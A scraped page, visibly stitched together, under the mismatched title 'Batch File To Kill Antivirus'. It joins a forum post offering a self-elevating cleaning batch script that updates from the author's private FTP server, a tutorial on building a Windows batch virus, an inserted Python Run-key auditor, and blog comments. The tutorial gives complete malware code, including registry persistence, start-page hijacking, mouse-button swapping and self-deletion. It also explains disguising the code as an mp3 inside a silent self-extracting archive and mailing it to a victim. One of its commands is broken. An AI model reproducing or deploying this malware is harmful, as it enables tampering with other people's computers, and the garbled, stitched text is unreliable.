
Batch File To Kill Antivirus

06.10.2019 


I have spent several days writing my new Batch cleaning script with the aim to help some friends of mine who run Windows Vista who are always getting bogged down with clutter and viruses. Times are getting tough for people these days so I decided to give it a go. This should work on Windows 7 or 8; it is UNTESTED on Win 7 or 8 so use at own risk. I would be interested in others who would like to try it out and send me some feedback. My question is can people verify if this works OK on other Windows operating systems; the reason I ask is I want my script which is a bit of block code from several other sources I found online which I combined and adapted to the needs of my friends, and of course myself. It is purely an Automation Script which I designed to be flexible in various situations, so that it could run some portable applications as well just in case people do not want to install anything extra on their machines; for example it runs MBAR, the portable MalwareBytes RootKit Removal tool, but you will have to place that in the Mbar folder below this batch file's path for that to work. My batch file ALSO uses some system optimization tools from SYSINTERNALS; if you do not have these tools installed my batch should just skip by them. I am curious as to how well it works on other versions of Windows but I am limited to XP and Vista here.

Thanks
Michelle

    :: Beginning of Batch Cleaning Script
    @echo off
    goto nodebug
    :: @@@@@ Below Block is for Debugging Purposes Only @@@@@
    @echo on
    echo ERROR TEST LOG FLAG
    IF NOT %1!==/go! %0 /go 1>C:\state%~n0.log 2>&1
    SHIFT
    ECHO %1 %2 %3 %4 %5
    :: @@@@@ Above Block is for Debugging Purposes Only @@@@@@
    :nodebug
    ::::::::::::::::::::::::::::::::::::::::::::
    :: Automatically check & get admin rights
    ::::::::::::::::::::::::::::::::::::::::::::
    echo Hello Computer Name: %computername%
    echo.
    ECHO =============================
    ECHO Running Admin shell
    ECHO =============================

    :checkPrivileges
    :: NET FILE only succeeds in an elevated shell
    NET FILE 1>NUL 2>NUL
    if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

    :getPrivileges
    if '%1'=='ELEV' (shift & goto gotPrivileges)
    ECHO.
    ECHO.
    ECHO Invoking UAC for Privilege Escalation
    ECHO.
    setlocal DisableDelayedExpansion
    set "batchPath=%~0"
    setlocal EnableDelayedExpansion
    :: Write a small VBScript that relaunches this batch file elevated
    ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs"
    ECHO UAC.ShellExecute "!batchPath!", "ELEV", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs"
    "%temp%\OEgetPrivileges.vbs"
    exit /B

    :gotPrivileges
    :: An elevated shell starts in System32, so switch to the script's own folder
    echo Current path is %cd%
    echo Changing directory to the path of the current script
    cd /d "%~dp0"
    echo Current path is %cd%
    ::::::::::::::::::::::::::::
    ::START
    :: @@@@@@@@@@@@ DEEP OR QUICK MODE SELECTION BELOW @@@@@@@@@@@@
    @For /F "tokens=1,2,3,4 delims=/ " %%A in ('Date /t') do @(
        Set Day=%%A
        Set Month=%%B
        Set Year=%%C
    )
    echo -
    echo %Year%-%Month%-%Day%
    echo.
    Set choice=n
    echo -
    echo Do you want to RUN Manual Deep Scans ALSO? Press: y: then: ENTER.
    Echo NOTE: Some of these deep scans can take a long time to complete.
    Echo You should only run the DEEP scans about once a month to save time.
    Echo OR If you KNOW there is a problem with your computer and it needs fixing.
    Echo If you Want FULL Automation and DO NOT want to
    echo be bothered with DEEP Manual Scans JUST Press Enter.
    Echo -
    set /P choice=: y or n ^> 
    echo.
    :: Updated Version 7 Fixed Date Local with new code found
    :: Made some major improvements runs much better now. :)
    :: Reason I am doing this is because The folks on Computing.net
    :: have given so much great support I just wanted to give something
    :: back thank you.

Please NOTE: Since I wrote this Batch file I have made a lot more improvements to it. It even has a SELF UPDATING FEATURE now that I built in; this means when you run it the first thing it does is check my private FTP for updates and then downloads the file as Clean6.new. It then does a file check on Clean6.new to make sure it is not a ZERO BYTE file, as can happen on FTP downloads. Once the new update is validated it overwrites itself and goes back to the start of the batch after setting a flag value to 1 to prevent loops. I can provide people with my self updating batch on a PRIVATE MESSAGE basis only, as clearly putting my FTP details on a public forum does pose some risks from being hacked. My server is however well protected and backed up in image ISO format so the risk is small in retrospect; it all depends on TRUST, if you trust me and I trust you :p We do live in precarious days I'm afraid with viruses and malware, so one benefit of my self update is the copy is renewed each time you run it, ensuring you have a good copy on your PC. To just give you some idea of the added features I list them below. My new Clean6.bat now does the following.

1/ After all the scans and before a defrag, runs SFC automatically if a Windows SETUP CD is in the CD drive and multiple virus and spyware problems are found AFTER CLEANING
2/ Ignores CD and DVD drives during a defrag
3/ Now runs cleanmgr.exe in 2 modes, custom and standard
4/ A few other optimisations and self checks

The current file size of Clean6.bat is 46kb

Michelle

If Dreams Come True Oleg Would be Famous so far he's very shy, so much for Being Famous ;)

message edited by Ortorea

I have added quite a few new functions and checking to my Auto-clean Scheduler Batch as I keep making more improvements; I did not want to flood the forum here with all the updates I made. Instead you can run my test.bat which retrieves the latest stable version automatically. You can also check the contents of my remote FTP server here

Michelle xoxoxox

PS, IF you feel the slightest bit wary of running my script why not try it out in VIRTUALBOX first?

message edited by Ortorea


I have just been informed by some friends using WINDOWS 8.1 of a bug that causes FTP downloads and uploads to fail; this will also prevent using my batch file's update feature. See this article, it appears to be caused by Internet Explorer 11. I have not been able to circumvent this BUG in Windows 7 and 8; it seems the latest version of Windows ftp does not support passive mode, so I have included a free 3rd party FTPS free-standing (not installed) application with my new batch file here. This small batch file should be able to retrieve updated files on any version of Windows and is much better for compatibility reasons.

Michelle xoxox

message edited by Ortorea

Just an update: I have now fixed a whole bunch of things and it works on Windows 7 32 bit and 64 bit versions now; you can download the updated version here. Happy Holidays from me, Ortorea.


It's always been this way: we fellows are the good guys and save the day fighting malware threats. But as they say, you need to think like a criminal to catch one! And so we do the same: to understand how malware works, how it gains access and gains control, we will make a batch-file-based virus ourselves. A little knowledge of programming, just enough to follow how we do it, and knowledge of the Windows registry are prerequisites.

Batch files, characterised by their .bat extension, are files containing a sequence of DOS commands that get executed when the batch file is run. This allows you to make simple programs that perform simple tasks within the limitations of the DOS shell. Though higher-level languages like BASIC, PASCAL and C interact with the system at a lower level, batch file processing is a good start to understand malware.

The kind of malware that we are going to learn to make is one that will perform the simple tasks of changing the desktop wallpaper, interchanging the left and right mouse keys, changing the start page of Internet Explorer (6), and making a start-up entry so that it starts every time the system starts. Though this sounds like a simple task, automating the procedure so that it works on a single wrong click by the user and runs all tasks hidden and without any confirmation is a tough job when started from scratch. The components of the virus will be a main executable file, under cover of some attractive icon, which on execution extracts in the background to a batch file and the wallpaper, then runs the batch file.

Before the code, let's learn a few basics, first on the creation of batch files. These aren't special files created by some special application. They are simple Notepad files in which code is written and whose extension is then changed to .bat. They run simple tasks like MOVE, COPY, RENAME etc., a few moderate tasks like changing file attributes (i.e. making a file hidden, giving it the system attribute or removing the attributes) and a few complex tasks like altering the system registry without user intervention.

The main drawback of a batch file is that it doesn't remain active in memory (though we can make it do so with a loop); it just performs the stated tasks and shuts down. Hence, it can act as a trigger, and not the process itself.

Now, let's learn a few commands of batch files. A basic knowledge of DOS is crucial, but if you don't have it, you can still follow what's going on. Starting with a simple rename command, the syntax is:

    RENAME [drive:][path]filename1 filename2

Example:

    RENAME "C:\documents and settings\aijaz.txt" gyaan.dat

Hence we see that we can change the extension of a file as well. If the path and drive of the file aren't specified, it is assumed that the file is in the current directory from which CMD is running. Example:

    RENAME aijaz.txt gyaan.dat

This command searches for a file named aijaz.txt in the current directory and renames it to gyaan.dat.

Coming to the MOVE command, it moves a file from one path to another. It is like cut and paste. The syntax is:

    MOVE [/Y | /-Y] [drive:][path]filename destination

The /Y switch allows CMD to overwrite files without confirmation, hence maintaining cover from the user. Example:

    MOVE /Y C:\aijaz.txt D:\

This moves the file aijaz.txt to drive D:. While moving a file, if the source path isn't mentioned, it is assumed that the file is in the current directory. But the destination path is mandatory.

We use the move command to change the wallpaper. The wallpaper, once set, is converted to a bitmap image and is then moved to the directory:

    C:\Documents and Settings\"user name"\Local Settings\Application Data\Microsoft

But the Windows directory may be on a different drive like D: or E:, and even the user name isn't known. This makes it unsuitable to mention a specific path in our code.


We use system parameters (environment variables) to identify the Windows drive and the user profile directory. The parameter %USERPROFILE% returns the path of the user's profile folder in the location given above. To give a path in CMD using system parameters, we need to write the path in quotation marks. The command to change the wallpaper becomes:

    MOVE /y Wallpaper1.bmp "%USERPROFILE%\Local Settings\Application Data\Microsoft"

This puts the wallpaper from the current directory into the location where the wallpaper is stored.

Note: It is to be kept in mind that Windows actually uses only uncompressed bitmap images as wallpapers. Whenever we set an image as wallpaper, it is converted to bitmap and then stored at the above mentioned location in the user profile with the name wallpaper1, hence the file name used here. Thus, the wallpaper we use here should already be a bitmap image; use an image editing tool like Irfanview, which does a good job at conversion to bitmap.

Once the wallpaper has been replaced, the system needs to be updated for the change to take place on the desktop. This is done using the command:

    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

After the execution of the batch file, it is desired that it is no longer available on the host PC, where the user might open it and view the code, which discloses the location of our batch virus and also the registry key we have added. This is done by simply deleting the files:

    DEL /F /Q /A:SHR filename

/F forces deletion of read-only files, /Q suppresses the confirmation to delete, and /A deletes files based on the given attributes: S for System, H for Hidden, R for Read only.

Now coming to editing the registry, there are two methods of editing a key. The first is making a .REG file, using the batch print tool to write registry keys into a file and later appending them to the registry. But this method adds a couple more lines to our code. Hence we prefer the second method of editing the registry directly via the command line using the REG command. The syntax to add a key to the registry is:

    REG ADD <main key> /v <sub key> /t <data type> /d <value> /f

The /f parameter enables editing a key without confirmation from the user. Our intention is to add a start-up entry in the registry such that our code gets executed every time Windows logs on. Hence the wallpaper is changed again, making the innocent user panic! The actual key we use is:

    REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

The above command writes a start-up key which makes the file pointed to by the key run every time Windows starts. We use the %windir% parameter to make sure that no error is encountered in case the OS is installed on some other drive. The point to be noticed here is that the same technique is used by malware to make sure it remains active on the system. The first thing to be done after ending a malicious code's execution is to terminate its start-up mechanism. Refer to the post Eradicate malware.

Similarly, to change the start page of Internet Explorer (tested on IE 6), the registry key is:

    REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d /f

Since IE 6 stores the default start page in a registry key, it is very vulnerable to this simple attack.
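A defender's view of the start-up entry described above, as an added example that is not part of the original post: the Python sketch below parses `reg query` output for the Run key and flags values shaped like the one this post writes. The sample output, the process-name list and the allowlist are constructed assumptions.

```python
import ntpath
import re

# Constructed sample of what
#   reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# prints on a machine where the post's batch file has run (not captured output).
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    winlogon    REG_SZ    C:\WINDOWS\force.exe
    ctfmon    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
# Assumed short lists for the example; tune them for a real environment.
SYSTEM_PROCESS_NAMES = {"winlogon", "svchost", "lsass", "csrss", "smss", "services"}
WINDOWS_ROOT_ALLOWED = {"explorer.exe", "notepad.exe", "regedit.exe"}


def parse_run_values(text):
    """Return (name, type, data) for every value line in reg query output."""
    return [m.group("name", "type", "data")
            for m in map(VALUE_LINE.match, text.splitlines()) if m]


def executable_of(data):
    """Strip arguments from a Run value and return only the program path."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.(?:exe|bat|cmd|com|scr|vbs))(?:\s|$)", data, re.I)
    return m.group(1) if m else data.split(" ", 1)[0]


def audit(text, windir=r"C:\Windows"):
    """Flag Run values that look like the start-up entry described in the post."""
    findings = []
    for name, _type, data in parse_run_values(text):
        exe = executable_of(data)
        folder, base = ntpath.split(ntpath.normcase(exe))
        reasons = []
        # A value named after a system process that launches some other file.
        if name.lower() in SYSTEM_PROCESS_NAMES and ntpath.splitext(base)[0] != name.lower():
            reasons.append("value name imitates a system process")
        # Programs dropped straight into the Windows directory are rare.
        if folder == ntpath.normcase(windir) and base not in WINDOWS_ROOT_ALLOWED:
            reasons.append("unexpected executable in the Windows directory")
        if reasons:
            findings.append((name, exe, reasons))
    return findings


if __name__ == "__main__":
    for name, exe, reasons in audit(SAMPLE):
        print(f"{name} -> {exe}: {'; '.join(reasons)}")
```

On a live system, feed it the text printed by `reg query` for the HKCU and HKLM Run keys; a flagged value can be removed with `reg delete` once the file it points to has been examined.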


I am still working on changing the start page of Mozilla Firefox.

Now to add a little more insult to injury, how about tying down our victim's right arm and making him struggle with his left? We're going to switch the right and left keys of the mouse, making our victim panic even more! Here is the command:

    RUNDLL32.exe USER32.DLL,SwapMouseButton

Having learned a few tricks of the trade, let's put down the final batch file code. Open a Notepad file and key in this script:

    @ECHO OFF
    REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d /f
    REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f
    copy /y Wallpaper1.bmp "%USERPROFILE%\Local Settings\Application Data\Microsoft"
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    RUNDLL32.exe USER32.DLL,SwapMouseButton
    rename song.exe force.exe
    move /y force.exe "%windir%"
    del /Q force.bat
    del /Q wallpaper.bmp

Save the file and change its extension to .bat. This is the core virus file.

Now pick up a photo of our victim and edit it so that it will annoy him the most! This can simply be done by opening the file in Notepad and making it funny or, if you know how to, editing it in Photoshop. Or sites like PhotoFunia can be used to spoil the photo. Usually these photos are in JPEG format. As mentioned earlier, we need a bitmap image. Convert it to bitmap using an image editing tool, preferably Irfanview since it preserves the quality of the photo. Rename this photo to wallpaper1.

It's quite obvious that nobody will click a suspicious-looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon, to mask it, so that the user will be compelled to open it. The file can be made to look like a folder, or an mp3 file, or a Word file, or anything. What you need is WinRAR and another piece of software called IconFX.

Install IconFX and run it. In the File menu, go to extract icons. Browse for the shell32.dll file located in the Windows system32 directory, then extract and save the icon of a folder. You can also use the snap tool of IconFX and take a snap of files to make an .ico icon file. Here we will name our packed file song and select the icon of an mp3 file. Just take a snap of an mp3 file, preferably the Windows Media Player icon. Save the icon at some location.

Install WinRAR on your PC. Select the two files, the batch file and the bitmap wallpaper, by holding the Ctrl key, right click and select the add to archive option. In the opened window, click Create SFX archive. Go to the Advanced tab and SFX options in it. In path to extract, select create in current folder. In the setup program section, in Run after extract, add the name force.bat. In the Modes tab, under the silent mode section, select hide all. In the update tab, in the overwrite section, select overwrite all files. In the text and icon tab, under Customize SFX logo and icon, in Load SFX icon from file, browse and set the icon to the MP3 icon. Click OK and compress the files. You will get a single .exe file which has the icon of an mp3 file. Let's rename this file as song.

Note: The names force.bat and song.exe must not be changed, since they are referred to by those names in the batch code.

Now we have a file with the name song, having an mp3 icon, quite innocent looking but having really naughty intentions! But the problem here is that if we mail it as it is, clients like Yahoo don't allow attaching .exe files, and when the victim downloads the file its extension is also shown, exposing our plot. Hence, in case of mailing this virus, compress it to a simple .RAR file and mail it. The victim will extract it, and then see a file with the name song and the icon of an mp3. Out of curiosity, he will open it and our job is done!!

Though I am still working on making better ones, I would like to end this post with a message that this was just for a little fun and to develop an understanding of how malware works. Let's not drift towards the wrong side of society!

On said: Hi Saurav! There are viruses that can be removed using batch files, provided you know what virus it is, and you know all of its files and registry keys and where it has them. This is really an interesting job, tedious though, but not worth it until the virus isn't being caught by normal antiviruses. In your case, I advise a scan with Malwarebytes. Once finished, just run the RatsCheddar tool to fix policies. Then once done, run a HijackThis scan and send me the log. I will go through it and send you, if required, a batch file to fix the remaining issues. All that I know comes from my experiences with my PC, since at that time I didn't have internet, and there was no one to help and guide. Now that I have it, I am using it to expand my knowledge, and help other people out 🙂.

On said: When you aren't able to remove an infected file from your pen drive, this implies that your PC is infected now too. I give the same advice as before, a scan with Malwarebytes.


Install it, update and run a complete full scan, while keeping the pen drive plugged in and including the pen drive in the scan. There are ways you can remove them manually, but it is long and tedious. You can read my post on to learn more anyhow.

And for the learning zeal, start off by experimenting, read my post, try to put it into practice in your case. You can read tech magazines; I prefer Chip. Since you have internet, explore tech sites. And do new things with your PC. It's really fun!!